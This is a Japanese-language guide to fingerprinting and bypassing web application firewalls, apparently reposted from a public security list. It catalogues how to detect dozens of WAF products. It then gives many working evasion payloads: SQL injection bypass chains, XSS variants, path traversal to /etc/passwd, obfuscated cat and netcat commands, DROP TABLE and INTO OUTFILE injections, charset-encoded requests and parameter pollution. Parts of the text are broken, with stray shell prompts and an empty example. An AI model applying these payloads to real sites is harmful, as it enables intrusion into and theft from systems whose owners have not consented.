  • 検出方法:
    • 応答ページに以下のテキスト断片のいずれかが含まれます:
      • beyondtrust ロゴを表示する画像。
      • Download SecureIIS Personal Edition
      • http://www.eeye.com/SecureIIS/ URLへの参照。
      • SecureIIS Error テキスト断片。
SecureSphere
  • 検出容易度:困難
  • 検出方法:
    • 応答ページに以下のテキスト断片が含まれます:
      • h2 テキストのエラー。
      • タイトルにテキストのみ Error。
      • Contact support for additional information. テキスト。
SEnginx
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページにキーワード SENGINX-ROBOT-MITIGATION が含まれます。
ServerDefender VP
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答に X-Pint ヘッダーフィールドとその値 p80 キーワードが含まれます。
Shadow Daemon
  • 検出容易度:困難
  • 検出方法:
    • ブロックされた応答ページにキーワード request forbidden by administrative rules. が含まれます。
ShieldSecurity
  • 検出容易度:困難
  • 検出方法:
    • ブロックされた応答ページには以下が含まれます:
      • You were blocked by the Shield. テキスト。
      • Something in the URL, Form or Cookie data wasn't appropriate テキスト断片。
      • Warning: You have {number} remaining transgression(s) against this site。
      • Seriously stop repeating what you are doing or you will be locked out。
SiteGround
  • 検出容易度:困難
  • 検出方法:
    • ブロックされた応答ページに
      The page you are trying to access is restricted due to a security rule テキスト断片が含まれます。
SiteGuard (JP Secure)
  • 検出容易度:困難
  • 検出方法:
    • 応答ページには以下が含まれます:
      • Powered by SiteGuard テキスト断片。
      • The server refuse to browse the page. テキスト断片。
      • The URL may not be correct. Please confirm the value.
SiteLock TrueShield
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページのソースには以下が含まれます:
      • www.sitelock.com URLへの参照。
      • Sitelock is leader in Business Website Security Services. テキスト。
      • sitelock-site-verification キーワード。
      • sitelock_shield_logo 画像。
SonicWall
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーにキーワード値 SonicWALL が含まれます。
    • ブロックされた応答ページに以下のテキスト断片のいずれかが含まれます:
      • Dell ロゴを表示する画像。
      • This request is blocked by the SonicWALL.
      • Web Site Blocked テキスト断片。
      • nsa_banner キーワード。 :p
Sophos UTM
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページにキーワード Powered by UTM Web Protection が含まれます。
SquareSpace
  • 検出容易度:困難
  • 検出方法:
    • 悪意のあるリクエストに対して応答コード 404 Not Found が返されます。
    • ブロックされた応答ページに以下のテキスト断片のいずれかが含まれます:
      • BRICK-50 キーワード。
      • 404 Not Found テキスト断片。
SquidProxy IDS
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーにフィールド値 squid/{version} が含まれます。
    • ブロックされた応答ページに
      Access control configuration prevents your request from being allowed at this time. が含まれます。
StackPath
  • 検出容易度:容易
  • 検出方法:
    • 画像に StackPath ロゴが表示されています。
    • ブロックされた応答ページに
      You performed an action that triggered the service and blocked your request が含まれます。
Stingray
  • 検出容易度:困難
  • 検出方法:
    • ブロックされた応答コードが 403 Forbidden または 500 Internal Error で返されます。
    • 応答ヘッダーに X-Mapping ヘッダーフィールド名が含まれます。
Sucuri CloudProxy
  • 検出容易度:容易
  • 検出方法:
    • 応答ヘッダーに Sucuri または Cloudproxy キーワードが含まれる場合があります。
    • ブロックされた応答ページに以下のテキスト断片が含まれます:
      • Access Denied - Sucuri Website Firewall テキスト。
      • https://sucuri.net/privacy-policy URLへの参照。
      • 時々メール [email protected]。
      • 著作権表示 ;copy {year} Sucuri Inc が含まれます。
    • 応答ヘッダーに通常のリクエストと共に X-Sucuri-ID ヘッダーが含まれます。
Synology Cloud
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページに Copyright (c) 2019 Synology Inc. All rights reserved. がテキストとしてあります。
Tencent Cloud
  • 検出容易度:中程度
  • 検出方法:
    • ブロックされた応答コードが 405 Method Not Allowed エラーを返します。
    • ブロックされた応答ページに waf.tencent-cloud.com URLへの参照が含まれます。
Teros
  • 検出容易度:困難
  • 検出方法:
    • 応答ヘッダーにクッキーフィールド st8id が含まれます。
TrafficShield
  • 検出容易度:中程度
  • 検出方法:
    • Server にキーワード F5-TrafficShield が含まれる場合があります。
    • 応答クッキーに ASINFO= 値が検出される場合があります。
TransIP
  • 検出容易度:容易
  • 検出方法:
    • 応答ヘッダーに固有のヘッダー X-TransIP-Backend が含まれます。
    • 応答ヘッダーにもう一つのヘッダー X-TransIP-Balancer が含まれます。
UCloud UEWaf
  • 検出容易度:容易
  • 検出方法:
    • 応答コンテンツには以下が含まれる場合があります:
      • URL内のディレクトリ /uewaf_deny_pages/default/img/ への参照。
      • ucloud.cn URL。
    • 返される応答ヘッダーには Server ヘッダーが uewaf/{version} に設定されています。
URLMaster SecurityCheck
  • 検出容易度:中程度
  • 検出方法:
    • 応答ヘッダーには以下が含まれる場合があります:
      • UrlMaster キーワード。
      • UrlRewriteModule キーワード。
      • SecurityCheck キーワード。
    • ブロックされた応答コードが 400 Bad Request テキスト断片で返されます。
URLScan
  • 検出容易度:中程度
  • 検出方法:
    • ブロックされた応答ページには以下が含まれます:
      • Rejected-by-URLScan テキスト断片。
      • Server Erro in Application 見出し。
      • テーブル内の Module: IIS Web Core。
USP Secure Entry
  • 検出容易度:中程度
  • 検出方法:
    • 応答ヘッダーにフィールド値 Secure Entry Server が含まれます。
Varnish (OWASP)
  • 検出容易度:容易
  • 検出方法:
    • 悪意のあるリクエストは 404 Not Found エラーを返します。
    • 応答ページには以下が含まれます:
      • Request rejected by xVarnish-WAF テキスト断片。
Varnish CacheWall
  • 検出容易度:容易
  • 検出方法:
    • 応答ページには以下が含まれます:
      • 見出しとして Error 403 Naughty, not Nice!。
      • テキストとして Varnish cache Server。
Viettel
  • 検出容易度:容易
  • 検出方法:
    • 応答ページには以下が含まれます:
      • ブロックページのタイトルが Access denied · Viettel WAF に設定されています。
      • https://cloudrity.com.vn/ URLへの参照。
      • 応答ページにキーワード Viettel WAF system が含まれます。
      • 連絡先情報として https://cloudrity.com.vn/customer/#/contact URLへの参照。
VirusDie
  • 検出容易度:容易
  • 検出方法:
    • 応答ページには以下が含まれます:
      • http://cdn.virusdie.ru/splash/firewallstop.png 画像。
      • copy; Virusdie.ru

        著作権表示。
      • 応答ページのタイトルに Virusdie キーワードが含まれます。
      • ページメタデータにキーワード name="FW_BLOCK" が含まれます。
WallArm
  • 検出容易度:中程度
  • 検出方法:
    • Serverヘッダーに値 nginx-wallarm が含まれます。
WatchGuard IPS
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーにフィールド値 WatchGuard が含まれる場合があります。
    • ブロックされた応答ページには以下が含まれます:
      • Request denied by WatchGuard Firewall テキスト。
      • フッターに WatchGuard Technologies Inc.。
WebARX Security
  • 検出容易度:容易
  • 検出方法:
    • 特にWordPressサイトのみに限定されます。
    • ブロックされた応答ページには以下が含まれます:
      • This request has been blocked by WebARX Web Application Firewall テキスト。
      • インストール先のディレクトリ /wp-content/plugins/webarx/ への参照。
WebKnight
  • 検出容易度:容易
  • 検出方法:
    • 応答ヘッダーにキーワード WebKnight が含まれます。
    • ブロックされた応答ページには以下が含まれます:
      • WebKnight Application Firewall Alert テキスト警告。
      • AQTRONIX WebKnight テキスト断片。
    • ブロックされた応答コードが 999 No Hacking で返されます。 :p
    • ブロックされた応答コードが 404 Hack Not Found でも返されます。 :p
WebLand
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーにキーワード Apache Protected By WebLand WAF が含まれます。
WebRay
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーにキーワード WebRay-WAF が含まれます。
    • 応答ヘッダーにフィールド DrivedBy とその値 RaySrv RayEng/{version} が含まれる場合があります。
WebSEAL
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーにキーワード WebSEAL が含まれます。
    • ブロックされた応答ページには以下が含まれます:
      • This is a WebSEAL error message template file テキスト。
      • WebSEAL server received an invalid HTTP request テキスト断片。
WebTotem
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページに The current request was blocked by WebTotem が含まれます。
West263CDN
  • 検出容易度:容易
  • 検出方法:
    • 応答ヘッダーに X-Cache ヘッダーフィールドとその値 WT263CDN が含まれます。
Wordfence
  • 検出容易度:容易
  • 検出方法:
    • 応答ヘッダーにキーワード WebKnight が含まれます。(注:原文のままですが、Wordfenceの記述にWebKnightが含まれているのは誤りかもしれませんが、翻訳は原文に従います)
    • ブロックされた応答ページには以下が含まれます:
      • Generated by Wordfence テキスト断片。
      • A potentially unsafe operation has been detected in your request to this site テキスト警告。
      • Your access to this site has been limited テキスト警告。
      • This response was generated by Wordfence テキスト断片。
WTS-WAF
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページのタイトルにキーワード WTS-WAF があります。
    • Serverヘッダーに値として wts が含まれます。
XLabs Security WAF
  • 検出容易度:容易
  • 検出方法:
    • 応答ヘッダーに X-CDN ヘッダーフィールドとその値 XLabs Security が含まれます。
Xuanwudun WAF
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページに http://admin.dbappwaf.cn/index.php/Admin/ClientMisinform/ サイトURLへの参照が含まれます。
Yunaq Chuangyu
  • 検出容易度:中程度
  • 検出方法:
    • 応答ページには以下への参照があります:
      • 365cyd.com または 365cyd.net URL。
      • ヘルプページ http://help.365cyd.com/cyd-error-help.html?code=403 への参照。
Yundun
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーに値として YUNDUN が含まれます。
    • X-Cache ヘッダーフィールドに値として YUNDUN が含まれます。
    • 応答ページにテキスト断片 Blocked by YUNDUN Cloud WAF が含まれます。
    • ブロックされた応答ページに yundun.com/yd_http_error/ URLへの参照が含まれます。
Yunsuo
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページに画像クラスの参照 yunsuologo が含まれます。
    • 応答ヘッダーにフィールド名 yunsuo_session が含まれます。
YxLink
  • 検出容易度:容易
  • 検出方法:
    • 応答に yx_ci_session クッキーフィールドが含まれる場合があります。
    • 応答に yx_language クッキーフィールドが含まれる場合があります。
    • Serverヘッダーにフィールド値 Yxlink-WAF が含まれます。
ZenEdge
  • 検出容易度:容易
  • 検出方法:
    • ブロックされた応答ページに /__zenedge/assets/ ディレクトリへの参照が含まれます。
    • Serverヘッダーにキーワード ZENEDGE が含まれます。
    • ブロックされた応答ヘッダーに X-Zen-Fury ヘッダーが含まれる場合があります。
ZScaler
  • 検出容易度:容易
  • 検出方法:
    • Serverヘッダーの値が ZScaler に設定されています。
    • ブロックされた応答ページには以下が含まれます:
      • Access Denied: Accenture Policy テキスト。
      • https://policies.accenture.com URLへの参照。
      • https://login.zscloud.net/img_logo_new1.png 画像への参照。
      • Your organization has selected Zscaler to protect you from internet threats。
      • The Internet site you have attempted to access is prohibited. Accenture's webfilters indicate that the site likely contains content considered inappropriate。

ファジング/ブルートフォース:

方法:

URL/エンドポイントに対して一連のペイロードを実行します。便利なファジングワードリスト:

  • ファジング専用のワードリスト
    • Seclists/Fuzzing.
    • Fuzz-DB/Attack
    • Other Payloads

技術:

  • ワードリストをファザーにロードし、ブルートフォースを開始します。
  • ファズされた異なるペイロードからのすべての応答を記録/ログします。
  • Chrome DesktopからiPhoneブラウザまでのランダムなユーザーエージェントを使用します。
  • ブロッキングが確認された場合、ファズレイテンシを増やします(例: 2〜4秒)。
  • 常にproxychainsを使用してください。IPがブロックされる可能性が現実的にあります。

欠点:

  • この方法はしばしば失敗します。
  • 多くの場合、IPがブロックされます(一時的/恒久的)。

正規表現のリバースエンジニアリング:

方法:

  • WAFをバイパスする最も効率的な方法。
  • 一部のWAFは、攻撃ペイロードをデータベース内のシグネチャと照合することに依存しています。
  • ペイロードが正規表現に一致すると、WAFはアラームをトリガーします。

技術:

ブラックリスト検出/バイパス

  • この方法では、ブラックリストに登録されているキーワードを観察することで、ルールを段階的に特定しようとします。
  • アイデアは、正規表現を推測し、ブラックリストに登録されていないキーワードを使用する次のペイロードを作成することです。

ケース: SQLインジェクション

• ステップ 1:

フィルタリングされたキーワード: and、or、union
推定される正規表現: preg_match('/(and|or|union)/i', $id)

  • ブロックされた試行: union select user, password from users
  • バイパスされたインジェクション: 1 || (select user from users where user_id = 1) = 'admin'
• ステップ 2:

フィルタリングされたキーワード: and、or、union、where

  • ブロックされた試行: 1 || (select user from users where user_id = 1) = 'admin'
  • バイパスされたインジェクション: 1 || (select user from users limit 1) = 'admin'
• ステップ 3:

フィルタリングされたキーワード: and、or、union、where、limit

  • ブロックされた試行: 1 || (select user from users limit 1) = 'admin'
  • バイパスされたインジェクション: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
• ステップ 4:

フィルタリングされたキーワード: and、or、union、where、limit、group by

  • ブロックされた試行: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
  • バイパスされたインジェクション: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
• ステップ 5:

フィルタリングされたキーワード: and、or、union、where、limit、group by、select

  • ブロックされた試行: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
  • バイパスされたインジェクション: 1 || 1 = 1 into outfile 'result.txt'
  • バイパスされたインジェクション: 1 || substr(user,1,1) = 'a'
• ステップ 6:

フィルタリングされたキーワード: and、or、union、where、limit、group by、select、'

  • ブロックされた試行: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
  • バイパスされたインジェクション: 1 || user_id is not null
  • バイパスされたインジェクション: 1 || substr(user,1,1) = 0x61
  • バイパスされたインジェクション: 1 || substr(user,1,1) = unhex(61)
• ステップ 7:

フィルタリングされたキーワード: and、or、union、where、limit、group by、select、'、hex

  • ブロックされた試行: 1 || substr(user,1,1) = unhex(61)
  • バイパスされたインジェクション: 1 || substr(user,1,1) = lower(conv(11,10,36))
• ステップ 8:

フィルタリングされたキーワード: and、or、union、where、limit、group by、select、'、hex、substr

  • ブロックされた試行: 1 || substr(user,1,1) = lower(conv(11,10,36))
  • バイパスされたインジェクション: 1 || lpad(user,7,1)
• ステップ 9:

フィルタリングされたキーワード: and、or、union、where、limit、group by、select、'、hex、substr、white space

  • ブロックされた試行: 1 || lpad(user,7,1)
  • バイパスされたインジェクション: 1%0b||%0blpad(user,7,1)

難読化:

方法:

  • ペイロードをさまざまなエンコーディングにエンコードする(試行錯誤のアプローチ)。
  • ペイロード全体、またはその一部をエンコードし、再帰的にテストできます。

技術:

1. 大文字小文字の切り替え

  • 一部の開発が不十分なWAFは、特定の大文字小文字を選択的にフィルタリングします。
  • 大文字と小文字を組み合わせて効率的なペイロードを開発できます。

標準: <script>alert()</script>
バイパス: <ScRipT>alert()</sCRipT>

標準: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
バイパス: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'

2. URLエンコーディング

  • 通常のペイロードを%エンコーディング/URLエンコーディングでエンコードします。
  • このようなオンラインツールで行えます。this。
  • Burpには組み込みのエンコーダ/デコーダが含まれています。

ブロック: <svG/x=">"/oNloaD=confirm()//
バイパス: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F

ブロック: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)
バイパス: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29

3. Unicode正規化

  • UnicodeエンコーディングのASCII文字は、バイパスのための優れたバリアントを提供します。
  • 結果を得るためにペイロード全体/一部をエンコードできます。

標準: <marquee onstart=prompt()>
難読化: <marquee onstart=\u0070r\u06f\u006dpt()>

ブロック: /?redir=http://google.com
バイパス: /?redir=http://google。com (Unicode alternative)

ブロック: <marquee loop=1 onfinish=alert()>x
バイパス: <marquee loop=1 onfinish=alert︵1)>x (Unicode alternative)

ヒント: HackerOneのこのレポートとこのレポートをご覧ください。:)

標準: ../../etc/passwd
難読化: %C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd

4. HTML表現

  • 多くの場合、Webアプリケーションは特殊文字をHTMLエンコーディングにエンコードし、それに応じてレンダリングします。
  • これにより、HTMLエンコーディング(数値/汎用)を使用した基本的なバイパスケースが生じます。

標準: ">
エンコード: &quot;&gt;&lt;img src=x onerror=confirm&lpar;&rpar;&gt; (General form)
エンコード: &#34;&#62;&#60;img src=x onerror=confirm&#40;&#41;&#62; (Numeric reference)

5. 混合エンコーディング

  • 場合によっては、WAFルールは特定のタイプのエンコーディングをフィルタリングする傾向があります。
  • この種のフィルターは、混合エンコーディングペイロードでバイパスできます。
  • タブと改行はさらに難読化を強化します。

難読化:``` XSS

root@kitploit:~
__6. コメントの使用__
- コメントは標準的なペイロードベクターを難読化します。
- ペイロードごとに異なる難読化方法があります。

__ブロックされる__: `<script>alert()</script>`  
__バイパスされる__: `<!--><script>alert/**/()/**/</script>`

__ブロックされる__: `/?id=1+union+select+1,2,3--`  
__バイパスされる__: `/?id=1+un/**/ion+sel/**/ect+1,2,3--`

__7. 二重エンコーディング__
- WAFフィルターは攻撃を防ぐために文字をエンコードすることがよくあります。
- しかし、不適切に開発されたフィルター(再帰フィルターなし)は二重エンコーディングでバイパスできます。

__標準__: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\`  
__難読化__: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\`

__標準__: `<script>alert()</script>`  
__難読化__: `%253Cscript%253Ealert()%253C%252Fscript%253E`

__8. ワイルドカード難読化__
- グロブパターンは、複数のファイルを扱うために様々なコマンドラインユーティリティで使用されます。
- これらを調整してシステムコマンドを実行できます。
- Linuxシステムのリモートコード実行脆弱性に固有です。

__標準__: `/bin/cat /etc/passwd`  
__難読化__: `/???/??t /???/??ss??`  
使用文字: `/ ? t s`

__標準__: `/bin/nc 127.0.0.1 1337`  
__難読化__: `/???/n? 2130706433 1337`  
使用文字: `/ ? n [0-9]`

__9. 動的ペイロード生成__
- 異なるプログラミング言語は連結のための異なる構文とパターンを持っています。
- これにより、多くのフィルターやルールをバイパスできるペイロードを効果的に生成できます。

__標準__: `<script>alert()</script>`  
__難読化__: `<script>eval('al'+'er'+'t()')</script>`

__標準__: `/bin/cat /etc/passwd`  
__難読化__: `/bi'n'''/c''at' /e'tc'/pa''ss'wd`
> Bashは実行のためにパス連結を許可します。

__標準__: ``  
__難読化__:```

13. トークンブレイカー

  • トークナイザへの攻撃は、トークンブレイカーを使ってリクエストをトークンに分割するロジックを破ろうとします。

  • トークンブレイカーは、文字列の要素と特定のトークンとの対応関係に影響を与え、それによってシグネチャによる検索を回避できる記号です。

  • ただし、トークンブレイカーを使用する場合でも、リクエストは有効である必要があります。

  • ケース: トークナイザにとって未知のトークン

    • ペイロード: ?id=‘-sqlite_version() UNION SELECT password FROM users --
  • ケース: パーサにとって未知のコンテキスト(コンテキスト外の括弧に注意)

    • ペイロード1: ?id=123);DROP TABLE users --
    • ペイロード2: ?id=1337) INTO OUTFILE ‘xxx’ --

ヒント: その他のペイロードは、このチートシートで作成できます。

14. 他のフォーマットでの難読化

  • 多くのWebアプリケーションはさまざまなエンコーディングタイプをサポートしており、エンコーディングを解釈できます(以下参照)。
  • ペイロードをWAFではサポートされていないがサーバーが解釈できるフォーマットに難読化することで、ペイロードを忍び込ませることができます。

ケース: IIS

  • IIS6、7.5、8、10(ASPX v4.x)は__IBM037__文字解釈を許可しています。
  • ペイロードをエンコードし、エンコードされたパラメータをクエリとともに送信できます。

元のリクエスト:``` POST /sample.aspx?id1=something HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 41

id2='union all select * from users--

root@kitploit:~
難読化リクエスト + URLエンコーディング:```
POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 115

%89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60

以下の表は、テストされたシステムで(メッセージを難読化するために使用できる場合の)異なる文字エンコーディングのサポートを示しています:

ヒント: この小さなPythonスクリプトを使用して、ペイロードやパラメータを目的のエンコーディングに変換できます。

ターゲットエンコーディング注記
Nginx, uWSGI-Django-Python3IBM037, IBM500, cp875, IBM1026, IBM273
  • クエリ文字列と本文をエンコードする必要があります。
  • クエリ文字列と本文のパラメータはURLデコードされます。
  • 等号とアンパサンドもエンコードする必要があります(URLエンコードは不要)。
Nginx, uWSGI-Django-Python2IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424
  • クエリ文字列と本文をエンコードする必要があります。
  • その後、クエリ文字列と本文のパラメータはURLデコードされます。
  • 等号とアンパサンドは一切エンコードしないでください。
Apache-TOMCAT8-JVM1.8-JSPIBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025
  • クエリ文字列は元の形式のまま(通常どおりURLエンコード可能)。
  • 本文はURLエンコードあり/なしで送信可能。
  • 等号とアンパサンドは一切エンコードしないでください。
Apache-TOMCAT7-JVM1.6-JSPIBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025
  • クエリ文字列は元の形式のまま(通常どおりURLエンコード可能)。
  • 本文はURLエンコードあり/なしで送信可能。
  • 等号とアンパサンドは一切エンコードしないでください。
IIS6, 7.5, 8, 10 -ASPX (v4.x)IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025
  • クエリ文字列は元の形式のまま(通常どおりURLエンコード可能)。
  • 本文はURLエンコードあり/なしで送信可能。
  • 等号とアンパサンドは一切エンコードしないでください。

HTTPパラメータ汚染

手法:

  • この攻撃手法は、サーバーが同じ名前のパラメータをどのように解釈するかに基づいています。
  • 以下のようなバイパスの可能性があります:
    • サーバーが最後に受信したパラメータを使用し、WAFが最初のパラメータのみをチェックする。
    • サーバーが類似したパラメータの値を結合し、WAFがそれらを個別にチェックする。

テクニック:

  • サーバーがパラメータをどのように解釈するかを列挙することがアイデアです。
  • この場合、WAFが検査していないパラメータにペイロードを渡すことができます。
  • 後でサーバーによって連結される可能性のあるパラメータにペイロードを分散させることも有効です。

以下は、異なるサーバーとその相対的な解釈の比較です:


Read more

環境パラメータの解釈例
ASP/IISカンマで連結par1=val1,val2
JSP, Servlet/Apache Tomcat最初のパラメータが採用されるpar1=val1
ASP.NET/IISカンマで連結par1=val1,val2
PHP/Zeus最後のパラメータが採用されるpar1=val2
PHP/Apache最後のパラメータが採用されるpar1=val2
JSP, Servlet/Jetty